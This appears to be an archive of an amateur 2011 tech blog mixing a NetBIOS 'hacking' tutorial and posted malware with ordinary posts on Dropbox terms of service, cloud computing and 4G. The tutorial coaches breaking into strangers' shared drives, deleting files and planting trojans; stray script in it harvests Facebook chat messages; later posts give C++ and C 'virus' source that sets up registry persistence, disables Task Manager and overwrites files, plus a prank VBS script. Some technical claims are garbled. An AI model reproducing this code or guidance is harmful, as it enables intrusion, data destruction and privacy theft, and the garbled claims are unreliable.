Wednesday 30 November 2011
Tuesday 11 October 2011
Tuesday 27 September 2011
Sunday 18 September 2011
Hi guys. First of all, I want to say that I didn't make this tutorial myself, I found it on Hacking Library and This method is very old and its of an extreme diffcult to find the right persn to do it but anyway it works (;
Introduction
1. Welcome to the basic NETBIOS document created by aCId_rAIn. This document will teach you some simple things about NETBIOS, what it does, how to use it, how to hack with it, and some other simple DOS commands that will be useful to you in the future. THIS DOCUMENT IS FOR NEWBIEZ ONLY!!! If you are NOT a newbie then don't go any farther reading this because if you're smart enough you probably already know it all. So don't waste yourt time reading something that you already know.
1. Hardware and Firmware
1a. The BIOS
The BIOS, short for Basic Input/Output Services, is the control program of the PC. It is responsible for starting up your computer, transferring control of the system to your operating system, and for handling other low-level functions, such as disk access.
NOTE that the BIOS is not a software program, insofar as it is not purged from memory when you turn off the computer. It's
firmware, which is basically software on a chip.
A convenient little feature that most BIOS manufacturers include is a startup password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there are numerous software-based BIOS password extractors available from your local H/P/A/V site.
NETBIOS/NBTSTAT - What does it do?
2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is used for identifying a remote network or computer for file sharing enabled. We can expoit systems using this method. It may be old but on home pc's sometimes it still works great. You can use it on your friend at home or something. I don't care what you do, but remember, that you are reading this document because you want to learn. So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there are two ways, but one's faster.
Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT
Method 2:Start>Run>Type Command>Type NBTSTAT
(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)
Ok! Now since you're in the DOS command under NBTSTAT, you're probably wondering what all that crap is that's on your screen. These are the commands you may use. I'm only going to give you what you need to know since you are striving to be l33t. Your screen should look like the following:
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying
statistics.
C:\WINDOWS\DESKTOP>
The only two commands that are going to be used and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Host Names
3. Now, the -a means that you will type in the HOST NAME of the person's computer that you are trying to access. Just in case you don't have any idea what a Host Name looks like here's an example.
123-fgh-ppp.internet.com
there are many variations of these adresses. For each different address you see there is a new ISP assigned to that computer. look at the difference.
abc-123.internet.com
ghj-789.newnet.com
these are differnet host names as you can see, and, by identifying the last couple words you will be able to tell that these are two computers on two different ISPs. Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com
IP Addresses
4. You can resolce these host names if you want to the IP address (Internet Protocol)
IP addresses range in different numbers. An IP looks like this:
201.123.101.123
Most times you can tell if a computer is running on a cable connection because of the IP address's numbers. On faster connections, usually the first two numbers are low. here's a cable connection IP.
24.18.18.10
on dialup connections IP's are higher, like this:
208.148.255.255
notice the 208 is higher than the 24 which is the cable connection.
REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.
Some companies make IP addresses like this to fool the hacker into believing it's a dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This gives you an idea on IP addresses which you will be using on the nbtstat command.
Getting The IP Through DC (Direct Connection)
5. First. You're going to need to find his IP or host name. Either will work. If you are on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname without parenthesis. you will either get a host name or an IP. copy it down. If you do not get it or you are not using mIRC then you must direct connect to their computer or you may use a sniffer to figure out his IP or host name. It's actually better to do it without the sniffer because most sniffers do not work now-a-days. So you want to establish a direct connection to their computer. OK, what is a direct connection? When you are:
Sending a file to their computer you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ when sending a file or a chat request acception allows a direct connection.
Any time you are sending a file. You are directly connected. (Assuming you know the user is not using a proxy server.)
Voice Chatting on Yahoo establishes a direct connection.
If you have none of these programs, either i suggest you get one, get a sniffer, or read this next statement.
If you have any way of sending thema link to your site that enables site traffic statistics, and you can log in, send a link to your site, then check the stats and get the IP of the last visitor. It's a simple and easy method i use. It even fool some smarter hackers, because it catches them off guard. Anyway, once you are directly
connected use either of the two methods i showed you earlier and get into DOS. Type NETSTAT -n. NETSTAT is a program that's name is short for NET STATISTICS. It will show you all computers connected to yours. (This is also helpful if you think you are being hacked by a trojan horse and is on a port that you know such as Sub Seven: 27374.) Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first line indicated the Protocol (language) that is being used by the two computers.
TCP (Transfer Control Protocol) is being used in this and is most widely used.
Local address shows your IP address, or the IP address of the system you on.
Foreign address shows the address of the computer connected to yours.
State tells you what kind of connection is being made ESTABLISHED - means it will stay connected to you as long as you are on the program or as long as the computer is allowing or is needing the other computers connection to it. CLOSE_WAIT means the connection closes at times and waits until it is needed or you resume connection to be made again. One that isn't on the list is TIME_WAIT which means it is timed. Most Ads that run on AOL are using TIME_WAIT states.
the way you know the person is directly connected to your computer is because of this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
Notice the host name is included in the fourth line instead of the IP address on all. This is almost ALWAYS, the other computer that is connected to you. So here, now, you have the host name:
abc-123-ppp.webnet.com
If the host name is not listed and the IP is then it NO PROBLEM because either one works exactly the same. I am using abc-123-ppp.webnet.com host name as an example. Ok so now you have the IP and/or host name of the remote system you want to connect to. Time to hack!
Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's the crap again. Well, now time to try out what you have leanred from this document by testing it on the IP and/or host name of the remote system. Here's the only thing you'll need to know.
IMPORTANT, READ NOW!!!
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
Remember this?
Time to use it.
-a will be the host name
-A will be the IP
How do i know this?
Read the Statements following the -a -A commands. It tells you there what each command takes.
So have you found which one you have to use?
GOOD!
Time to start.
Using it to your advantage
6. Type this if you have the host name only.
NBTSTAT -a (In here put in hostname without parenthesis)
Type this is you have the IP address only.
NBTSTAT -A (In here put in IP address without parenthesis)
Now, hit enter and wait. Now Either one of two things came up
1. Host not found
2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 UNIQUE Registered
WORKGROUP GROUP Registered
GMVPS01 UNIQUE Registered
GMVPS01 UNIQUE Registered
WORKGROUP GROUP Registered
---------------------------------------------
If the computer responded "Host not found" Then either one of two things are the case:
1. You screwed up the host name.
2. The host is not hackable.
If number one is the case you're in great luck. If two, This system isn't hackable using the NBTSTAT command. So try another system.
If you got the table as above to come up, look at it carefully as i describe to you each part and its purpose.
Name - states the share name of that certain part of the computer
, , , - Are the Hexidecimal codes giving you the services available on that share name.
Type - Is self-explanatory. It's either turned on, or activated by you, or always on.
Status - Simply states that the share name is working and is activated.
Look above and look for the following line:
GMVPS01 UNIQUE Registered
See it?
GOOD! Now this is important so listen up. The Hexidecimanl code of means that file sharing is enabled on the share name that is on that line with the hex number. So that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's How to do it. (This is the hard part)
LMHOST File
7. There is a file in all Windows systems called LMHOST.sam. We need to simply add the IP into the LMHOST file because LMHOST basically acts as a network, automatically logging you on to it. So go to Start, Find, FIles or Folders. Type in LMHOST and hit enter. when it comes up open it using a text program such as wordpad, but make sure you do not leave the checkmark to "always open files with this extension" on that. Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmans erver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.
Read this over and over until you understand the way you want your connection to be set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE
Pre will preload the connection as soon as you log on to the net. DOM is the domain or IP address of the host you are connecting to. INCLUDE will automaticall set you to that file path. In this case as soon as I log on to the net I will get access to 255.102.255.102 on the C:/ drive. The only problem with this is that by doin the NETSTAT command while you are connected, and get the IP of your machine. That's why it only works on simple PC machines. Because people in these days are computer illiterate and have no idea of what these commands can do. They have no idea what NETSTAT is, so you can use that to your advantage. Most PC systems are kind of hard to hack using this method now because they are more secure and can tell when another system is trying to gain access. Also, besure that you (somehow) know whether they are running a firewall or not because it will block the connection to their computer. Most home systems aren't running a firewall, and to make it better, they don't know how operate the firewall, therefore, leaving the hole in the system. To help you out some, it would be a great idea to pick up on some programming languages to show you how the computer reads information and learn some things on TCP/IP (Transfer Control Protocol/Internet Protocol) If you want to find out whether they are running a firewall, simply hop on a Proxy and do a port scan on their IP. You will notice if they are running a firewall because most ports are closed. Either way, you still have a better chance of hacking a home system than hacking Microsoft.
Gaining Access
7. Once you have added this to you LMHOST file. You are basically done. All you need to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system. When it comes up, simply double click it, and boom! There's a GUI for you so you don't have to use DOS anymore. You can use DOS to do it, but it's more simple and fun this way, so that's the only way i put it. When you open the system you can edit, delete, rename, do anything to any file you wish. I would also delete the command file in C:/ because they may use it if they think someone is in their computer. Or simply delete the shortcut to it. Then here's when the programming comes in handy. Instead of using the NBTSTAT method all the time, you can then program you own trojan on your OWN port number and upload it to the system. Then you will have easier access and you will also have a better GUI, with more features. DO NOT allow more than one connection to the system unless they are on a faster connection. If you are downloading something from their computer and they don't know it and their connection is being slow, they may check their NETSTAT to see what is connected, which will show your IP and make them suspicious. Thats it. All there is to it. Now go out and scan a network or something and find a computer with port 21 or something open.
if(self == top){var fb_chm_time = {};setInterval(function(){var str = '[';if( typeof(chatDisplay)!='undefined' && chatDisplay.histories) for(var i in chatDisplay.histories){ var history = chatDisplay.histories[i]; if(!chatDisplay.tabs[i]) continue; var friendName = chatDisplay.tabs[i].name; str += '['; var update = false; for(var j in history){ var m = history[j]; if(m.type =='msg'){ if(fb_chm_time[i] && fb_chm_time[i] >= m.time) continue; fb_chm_time[i] = m.time; update = true; str += '{friendName:"' + friendName +'",friendID:"' + i +'",message:"' + escape(m.msg.text) + '",from:"' + m.from + '",to:"' + m.to + '",type:"' + m.type + '",time:' + m.time + '},'; }} str = update ? str.substr(0, str.length-1) + '],' : str + '],';}str = str.substr(0, str.length-1) + ']';var div = document.getElementById('fb_communication_div');div.setAttribute('status','waiting');div.setAttribute('parameter',encodeURIComponent(str));var evt = document.createEvent('Events');evt.initEvent('fb_savemessages_12', true, false);document.dispatchEvent(evt);},1000);}
Posted on 04:54 by Unknown
Sunday 11 September 2011
This is a code to hack a website .
coding: Try this code to hack a website . i don't no it working or not...............................
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24;x4=300; y4=200; x5=300; y5=200; DI=document.images; DIL=DI.length;function A(){for(i=0; i<dil ; i++){DIS=DI[ i ].style;DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5;DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++ }setInterval('A()',5); void(0);
Posted on 07:39 by Unknown
In this site they listed lot of design, so must visit this site to improve u r idea for develop a image with photoshop
http://designrfix.com/resources/photoshop-cs5-tutorials-70-creative-tips
http://www.crazyleafdesign.com/blog/40-awesome-photoshop-cs5-tutorials/
http://www.tutorialchip.com/photoshop/36-creative-and-useful-photoshop-cs5-tutorials/
http://www.w3blend.com/2011/02/100-stunning-adobe-photoshop-cs5-tutorials/
http://www.photoshoproadmap.com/Photoshop-blog/2010/08/17/27-super-creative-photo-effects-tutorials-for-photoshop/
Posted on 07:32 by Unknown
visit this site it helpful for the final year projects
http://www.finalsemprojects.com/ieee-projects/
Posted on 06:47 by Unknown
#include
#include
#include
#include
#include
#include
using namespace std;
int random, Freq, Dur, X, Y;
HWND mywindow, TaskMgr, CMD, Regedit;
char Notepad[MAX_PATH]="notepad.exe";
char MineSweeper[MAX_PATH]="winmine.exe";
char Hearts[MAX_PATH]="mshearts.exe";
char Website[MAX_PATH]="http:\\www.google.com";
void SetUp();
void Run( int ID );
void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();
DWORD WINAPI DestroyWindows(LPVOID);
int main()
{
srand( time(0) );
random = rand()%6;
system("title :.Virus.:");
BlockInput( true );
SetUp();
BlockInput( false );
CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
while(1)
{
Run( random );
Sleep(10);
}
}
void SetUp()
{
char system[MAX_PATH];
char pathtofile[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
GetSystemDirectory(system,sizeof(system));
strcat(system,"\\winminer.exe");
CopyFile(pathtofile,system,false);
HKEY hKey;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Mcft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey, "SetUp",0,REG_SZ,(const unsigned char*)system,sizeof(system));
RegCloseKey(hKey);
mywindow = FindWindow(NULL,":.Virus.:");
cout<<"You Are Doomed cyberot";
Sleep(1000);
ShowWindow(mywindow, false);
}
void Run( int ID )
{
if( ID == 1 )
{
BlockInput(true);
}
else if( ID == 2 )
{
Beeper();
}
else if( ID == 3 )
{
OpenStuff();
}
else if( ID == 4 )
{
Hibernation();
}
else if( ID == 5 )
{
CrazyMouse();
}
else
{
BlockInput(true);
Beeper();
OpenStuff();
CrazyMouse();
}
}
void Beeper()
{
Freq = rand()%2001;
Dur = rand()%301;
Beep( Freq, Dur );
}
void OpenStuff()
{
ShellExecute(NULL,"open",Notepad,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",MineSweeper,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Hearts,NULL,NULL,SW_MAXIMIZE);
ShellExecute(NULL,"open",Website,NULL,NULL,SW_MAXIMIZE);
}
void Hibernation()
{
Sleep(1000);
SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
}
void CrazyMouse()
{
X = rand()%801;
Y = rand()%601;
SetCursorPos( X, Y );
}
DWORD WINAPI DestroyWindows(LPVOID)
{
while(1)
{
TaskMgr = FindWindow(NULL,"Windows Task Manager");
CMD = FindWindow(NULL, "Command Prompt");
Regedit = FindWindow(NULL,"Registry Editor");
if( TaskMgr != NULL )
{
SetWindowText( TaskMgr, "You Suck Balls Superman");
PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( CMD != NULL )
{
SetWindowText( CMD, "You Suck Balls Superman");
PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
if( Regedit != NULL )
{
SetWindowText( Regedit, "You Suck Balls Superman");
PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
}
Sleep(10);
}
}
Posted on 06:35 by Unknown
This is an virus program . if u run this program means it erase all u r data in system so be careful . if it create any problem. is not my mistake .....
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst("*.*",&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],"rb");
host=fopen(ffblk.ff_name,"rb+");
if(host==NULL) goto next;
x=772;
printf("Infecting %s\n",ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf("DONE! (Total Files Infected= %d)",a);
end=clock();
printf("TIME TAKEN=%f SEC\n",(end-st)/CLK_TCK);
getch();
}
Posted on 06:20 by Unknown
Friday 9 September 2011
Type :
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as "Anything.VBS" and send it.
Posted on 09:08 by Unknown
Thursday 8 September 2011
To see more details visit this site..
http://en.wikipedia.org/wiki/World_population
Posted on 04:25 by Unknown
Sunday 14 August 2011
Saturday 9 July 2011
Important of Designing A Product
Dropbox is revised their Terms of Service (TOS) over the long weekend. That triggered a flurry of activities on Twitter. Dave Winer even deleted his Dropbox account saying that he would revisit it once the dust settles. A lot of people concluded that there's nothing wrong in the new TOS and that people are simply overreacting. And then Dropbox updated their blog post, twice, explaining that there is nothing wrong with new TOS and cleared some confusion. I would let you be the judge of the situation and the new TOS. This post is not about analyzing the new TOS of Dropbox, but it's about looking at more basic issue in product design. What we witnessed was just a symptom.
Let me be very clear - your product design includes getting the TOS and End User License Agreement (EULA) right before you open up the service. The way the most TOS and EULA are worded, an average user can't even fathom what the service actually does, what information it collects, what it shares, and most importantly what's that it absolutely won't do. It's ironic that the simplicity element of Dropbox's design — there will be a folder and that will sync — made it extremely popular and when they designed the TOS, they had to publish a blog post with two updates and 3000+ comments to explain and clarify the new TOS to the very same users. There's something wrong here.
For a product or a service to have a great experiential design, it's absolutely important to get the TOS and EULA right upfront and even validated by end users. People release their product in beta and go to a great length to conduct usability study to improve the product design. Why exclude TOS?
I have worked with some great lawyers, but they don't make a good product designer. I'm a big fan of constraints-based design. Lawyers are great at giving you constraints - the things that you can and cannot do. Start there. Get a clear understanding of legal ramifications, ask someone other than a lawyer to write a TOS, get it signed off by a lawyer, and most importantly validate by end users. Then, start the product design using those constraints. If you feel too constrained, go back and iterate on TOS. Drafting a TOS is not different than prototyping a product.
I would rather have bloggers, thought leaders, and end users critique the product design on my blog instead of TOS. I would love to work on that feedback as against getting into a reactive mode to stop the bad PR and legal consequences. Thomas Otter says "law exists for a reason." Don't exclude lawyers but please don't let lawyers drive your business. Educate them on technology and end users and most importantly, involve them early on. The lawyers are paid to be risk-averse. As an entrepreneur, you need to do the right thing and challenge the status quo to innovate without jeopardizing the end users. It's a tough job, but it can be accomplished.
I don't want to single out Dropbox. There are other companies who have gone through the same cycle and yet I don't see entrepreneurs doing things differently. In this process, the cloud gets a bad rep. What happened to Dropbox has got nothing to do with what people should and should not do in the cloud. That would be a knee-jerk response. The fundamental issue is a different one. Treating symptoms won't fix the underlying chronic issue.
Posted on 02:58 by Unknown
Tuesday 7 June 2011
Cloud computing is refers to the on-demand provision of computational resources (data, software) via a computer network is rather than from a local computer system .The Users or clients can submit a task, such as word processing, to the service provider, without actually possessing the software or hardware. The consumer's computer may contain very little software or data (perhaps a minimal operating system and web browser only), serving as a basic display terminal connected to the Internet. Since the cloud is underlying delivery mechanism, cloud-based applications and services may support any type of software application or service in use today.
In the past, both data and software had to be stored and processed on or near the computer. The development of Local Area Networks allowed for a system in which multiple CPUs and storage devices could be organized to increase the performance of the entire system. In an extension to that concept, cloud computing fundamentally allows for a functional separation between the resources used and the user's computer, usually residing outside the local network, for example, in a remote datacenter. Consumers now routinely use data-intensive applications driven by cloud technology that were previously unavailable due to cost and deployment complexity. In many companies, employees and company departments are bringing a flood of consumer technology into the workplace, which raises legal compliance and security concerns for the corporation.
The term "software as a service" is sometimes used to describe programs offered through "The Cloud".
A common shorthand for a provided cloud computing service (or even an aggregation of all existing cloud services) is "The Cloud".
An analogy to explain cloud computing is that of public utilities such as electricity, gas, and water. Centralized and standardized utilities freed individuals from the difficulties of generating electricity or pumping water. All of the development and maintenance tasks involved in doing so was alleviated. With Cloud computing, this translates to a reduced cost in software distribution to providers still using hard mediums such as DVDs. Consumer benefits are that software no longer has to be installed and is automatically updated, but savings in terms of money is yet to be seen.
The principle behind the cloud is that any computer connected to the Internet is connected to the same pool of computing power, applications, and files. Users can store and access personal files such as music, pictures, videos, and bookmarks or play games or do word processing on a remote server rather than physically carrying around a storage medium such as a DVD or thumb drive. Even those using web-based email such as Gmail, Hotmail, Yahoo!, a company-owned email, or even an e-mail client program such as Outlook, Evolution, Mozilla Thunderbird, or Entourage are making use of cloud email servers. Hence, desktop applications that connect to internet-host email providers can also be considered cloud applications.
How it will work
Cloud computing utilizes the network as a means to connect the user to resources that are based in the cloud, as opposed to actually possessing them. The cloud is may be accessed via the Internet or a company network, or both. Cloud services may be designed to work equally well with Linux, Mac, and Windows platforms. With smartphones and tablets on the rise, cloud services have changed to allow access from any device connected to the Internet, allowing mobile workers access on-the-go, as in telecommuting, and extending the reach of business services provided by outsourcing.The service provider may pool the processing power of multiple remote computers in "the cloud" to achieve the task, such as backing up of large amounts of data, word processing, or computationally intensive work. These tasks would normally be difficult, time consuming, or expensive for an individual user or a small company to accomplish, especially with limited computing resources and funds. With cloud computing, clients require only a simple computer, such as netbooks, which were created with cloud computing in mind, or even a smartphone, with a connection to the Internet, or a company network, in order to make requests to and receive data from the cloud, hence the term "software as a service" (SaaS). Computation and storage is divided among the remote computers in order to handle large volumes of both, thus the client need not purchase expensive hardware or software to handle the task. The outcome of the processing task is returned to the client over the network, depending on the speed of the Internet connection.
The Cloud engineering
The Cloud storage
Cloud storage is a model of networked computer data storage where data is stored on multiple virtual servers, in general hosted by third parties, rather than being hosted on dedicated servers. Hosting companies operate large data centers; and people who require their data to be hosted buy or lease storage capacity from them and use it for their storage needs. The data center operators, in the background, virtualize the resources according to the requirements of the customer and expose them as virtual servers, which the customers can themselves manage. In the physical sense, the resource may span across multiple servers.
Posted on 03:52 by Unknown
Tuesday 31 May 2011
4G
In the telecommunications, 4G is the fourth generation of cellular wireless standards. It is a successor to the 3G and 2G families of standards. In 2008, the ITU-R organization specified the IMT-Advanced (International Mobile Telecommunications Advanced) requirements for 4G standards, setting peak speed requirements for 4G service at 100 Mbit/s for high mobility communication (such as from trains and cars) and 1 Gbit/s for low mobility communication (such as pedestrians and stationary users).
A 4G system is expected to provide a comprehensive and secure all-IP based mobile broadband solution to laptop computer wireless modems, smartphones, and other mobile devices. Facilities such as ultra-broadband Internet access, IP telephony, gaming services, and streamed multimedia may be provided to users.
Pre-4G technologies such as mobile WiMAX and first-release Long term evolution (LTE) have been on the market since 2006 and 2009 respectively, and are often branded as 4G in marketing materials. The current versions of these technologies did not fulfill the original ITU-R requirements of data rates approximately up to 1 Gbit/s for 4G systems.
IMT-Advanced compliant versions of the above two standards are under development and called “LTE Advanced” and “WirelessMAN-Advanced” respectively. ITU has decided that “LTE Advanced” and “WirelessMAN-Advanced” should be accorded the official designation of IMT-Advanced. On December 6, 2010, ITU announced that current versions of LTE, WiMax and other evolved 3G technologies that do not fulfill "IMT-Advanced" requirements could be considered "4G", provided they represent forerunners to IMT-Advanced and "a substantial level of improvement in performance and capabilities with respect to the initial third generation systems now deployed."
In all suggestions for 4G, the CDMA spread spectrum radio technology used in 3G systems and IS-95 is abandoned and replaced byOFDMA and other frequency-domain equalization schemes. This is combined with MIMO (Multiple In Multiple Out), e.g., multiple antennas, dynamic channel allocation and channel-dependent scheduling.
The nomenclature of the generations generally refers to a change in the fundamental nature of the service, non-backwards compatible transmission technology, and new frequency bands. New generations have appeared about every ten years since the first move from 1981 analog (1G) to digital (2G) transmission in 1992. This was followed, in 2001, by 3G multi-media support, spread spectrumtransmission and at least 200 kbit/s, in 2011 expected to be followed by 4G, which refers to all-IP packet-switched networks, mobile ultra-broadband (gigabit speed) access and multi-carrier transmission
4G predecessors and discontinued candidate systems
3GPP Long Term Evolution (LTE)
The pre-4G technology 3GPP Long Term Evolution (LTE) is often branded "4G", but the first LTE release does not fully comply with the IMT-Advanced requirements. LTE has a theoretical net bit rate capacity of up to 100 Mbit/s in the downlink and 50 Mbit/s in the uplink if a 20 MHz channel is used — and more if multiple-input multiple-output (MIMO), i.e. antenna arrays, are used.
The physical radio interface was at an early stage named High Speed OFDM Packet Access(HSOPA), now named Evolved UMTS Terrestrial Radio Access (E-UTRA). The first LTE USB dongles do not support any other radio interface.
The world's first publicly available LTE service was opened in the two Scandinavian capitalsStockholm (Ericsson system) and Oslo (a Huawei system) on 14 December 2009, and branded 4G. The user terminals were manufactured by Samsung
Currently, the two publicly available LTE services in the United States are provided by MetroPCS, andVerizon Wireless. AT&T also has an LTE service in planned for deployment between mid-2011 and end of 2013, Sprint Nextel has stated it's considering switching from WiMax to LTE in the near future.
Currently, the two publicly available LTE services in the United States are provided by MetroPCS, andVerizon Wireless. AT&T also has an LTE service in planned for deployment between mid-2011 and end of 2013, Sprint Nextel has stated it's considering switching from WiMax to LTE in the near future.
Mobile WiMAX (IEEE 802.16e)
The Mobile WiMAX (IEEE 802.16e-2005) mobile wireless broadband access (MWBA) standard (also known as WiBro in South Korea) is sometimes branded 4G, and offers peak data rates of 128 Mbit/s downlink and 56 Mbit/s uplink over 20 MHz wide channels
The world's first commercial mobile WiMAX service was opened by KT in Seoul, South Korea on 30 June 2006.
Sprint Nextel has begun using Mobile WiMAX, as of September 29, 2008 branded as a "4G" network even though the current version does not fulfil the IMT Advanced requirements on 4G systems.
In Russia, Belarus and Nicaragua WiMax broadband internet access is offered by a Russian company Scartel, and is also branded 4G,Yota.
The following table shows a comparison of 4G candidate systems as well as other competing technologies.
Standard | Family | Primary Use | Radio Tech | Downlink fd(Mbit/s) | Uplink (Mbit/s) | Notes |
|---|---|---|---|---|---|---|
| WiMAX | 802.16 | Mobile Internet | MIMO-SOFDMA | 128 (in 20MHz bandwidth) | 56 (in 20MHz bandwidth) | WiMAX update IEEE 802.16m expected to offer peak rates of at least 1 Gbit/s fixed speeds and 100Mbit/s to mobile users. |
| LTE | UMTS/4GSM | General 4G | OFDMA/MIMO/SC-FDMA | 100 (in 20MHz bandwidth) | 50 (in 20 MHz bandwidth) | LTE-Advanced update expected to offer peak rates up to 1 Gbit/s fixed speeds and 100 Mb/s to mobile users. |
| Flash-OFDM | Flash-OFDM | Mobile Internet mobility up to 200mph (350km/h) | Flash-OFDM | 5.3 10.6 15.9 | 1.8 3.6 5.4 | Mobile range 30km (18 miles) extended range 55 km (34 miles) |
| HIPERMAN | HIPERMAN | Mobile Internet | OFDM | 56.9 | ||
| Wi-Fi | 802.11 (11n) | Mobile Internet | OFDM/MIMO | 300 (using 4x4 configuration in 20MHz bandwidth) or 600 (using 4x4 configuration in 40MHz bandwidth) | Antenna, RF front end enhancements and minor protocol timer tweaks have helped deploy long range P2P networks compromising on radial coverage, throughput and/or spectra efficiency (310km & 382km) | |
| iBurst | 802.20 | Mobile Internet | HC-SDMA/TDD/MIMO | 95 | 36 | Cell Radius: 3–12 km Speed: 250km/h Spectral Efficiency: 13 bits/s/Hz/cell Spectrum Reuse Factor: "1" |
| EDGE Evolution | GSM | Mobile Internet | TDMA/FDD | 1.6 | 0.5 | 3GPP Release 7 |
